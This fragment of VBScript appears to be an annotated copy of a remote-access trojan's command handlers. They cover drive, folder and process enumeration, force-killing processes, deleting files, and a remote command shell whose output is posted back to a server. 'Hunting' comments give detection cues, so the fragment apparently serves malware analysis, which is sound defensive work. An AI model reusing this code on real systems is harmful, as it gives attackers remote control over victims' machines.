- enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
- end if
- next
- end Function
- ' enumfaf: handler for "enum-faf". Returns a listing of the folder enumdir: the folder path first,
- ' then one "<name>|<size>|<d or f>|<attributes>" entry per subfolder and file (size is empty for
- ' folders), all joined by the "<|>" separator; the caller posts the result to /is-enum-faf.
- function enumfaf (enumdir)
- enumfaf = enumdir & spliter
- for each folder in filesystemobj.getfolder (enumdir).subfolders
- enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
- next
- for each file in filesystemobj.getfolder (enumdir).files
- enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
- next
- end function
- ' enumprocess: handler for "enum-process". Returns "<name>|<pid>|<executable path>" for every
- ' win32_process row, joined by the "<|>" separator; the caller posts the result to /is-enum-process.
- function enumprocess ()
- on error resume next
- set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
- ' flag 48 = return immediately + forward-only enumerator
- set colitems = objwmiservice.execquery("select * from win32_process",,48)
- dim objitem
- for each objitem in colitems
- enumprocess = enumprocess & objitem.name & "|"
- enumprocess = enumprocess & objitem.processid & "|"
- enumprocess = enumprocess & objitem.executablepath & spliter
- next
- end function
- ' exitprocess: handler for "exit-process". Force-kills the given PID and its child processes with
- ' taskkill, minimized (window style 7), waiting for it to finish.
- ' Hunting: taskkill /F /T /PID spawned by wscript.exe.
- sub exitprocess (pid)
- on error resume next
- shellobj.run "taskkill /F /T /PID " & pid,7,true
- end sub
- ' deletefaf: handler for "delete". Tries to delete the given path first as a file and then as a
- ' folder; errors from whichever call does not apply are suppressed.
- sub deletefaf (url)
- on error resume next
- filesystemobj.deletefile url
- filesystemobj.deletefolder url
- end sub
- ' cmdshell: handler for "cmd-shell". Runs the server-supplied command line through %comspec% /c
- ' and returns stdout, or stderr when stdout is already at end of stream, or an empty string;
- ' the caller posts the result to /is-cmd-shell.
- ' Hunting: cmd.exe child processes of wscript.exe, followed by a POST to /is-cmd-shell.
- function cmdshell (cmd)
- dim httpobj,oexec,readallfromany
- set oexec = shellobj.exec ("%comspec% /c " & cmd)
- if not oexec.stdout.atendofstream then
- readallfromany = oexec.stdout.readall
- elseif not oexec.stderr.atendofstream then
- readallfromany = oexec.stderr.readall
- else
- readallfromany = ""
- end if
- cmdshell = readallfromany
- end function